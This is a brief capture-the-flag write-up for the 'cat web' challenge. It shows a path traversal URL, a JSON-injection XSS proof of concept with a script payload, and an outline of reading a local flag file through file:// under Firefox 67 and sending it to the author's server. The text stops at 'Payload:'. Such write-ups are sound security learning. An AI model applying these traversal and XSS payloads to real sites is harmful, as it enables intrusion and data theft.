Team SED ( 5th )

• Web
  • cat web
  • temple-js
• pwn

  • crusty-sandbox

    == crsty-sndbx

Web

cat web

1. http://catweb.zajebistyc.tf/cats?kind=../../../../ ⇒ path traversal

   ⇒ /app/templates/flag.txt , /app/templates/index.html

2. User-Agent ⇒ bot use firefox . (./firefox [url] expect the same effect as using a bot. )

3. XSS

we can overwrite json.

<http://catweb.zajebistyc.tf/cats?kind=>", "status": "ok", "content":["asdf"], "b":"

it can cause xss in img src

PoC:

<http://catweb.zajebistyc.tf/?">, "status": "ok", "content":["a\\"><script>alert(1);</script>"], "b":"

We can read file with file:// protocol, but SOP block that protocol in http:// request.

so i try to request file:///app/templates/index.html that has same feature.

It also has xss, so we can execute arbitrary js code.

Try to request file:///app/templates/flag.txt , and pass my server.

( it can only use firefox < 68, chall use firefox 67 )

Payload: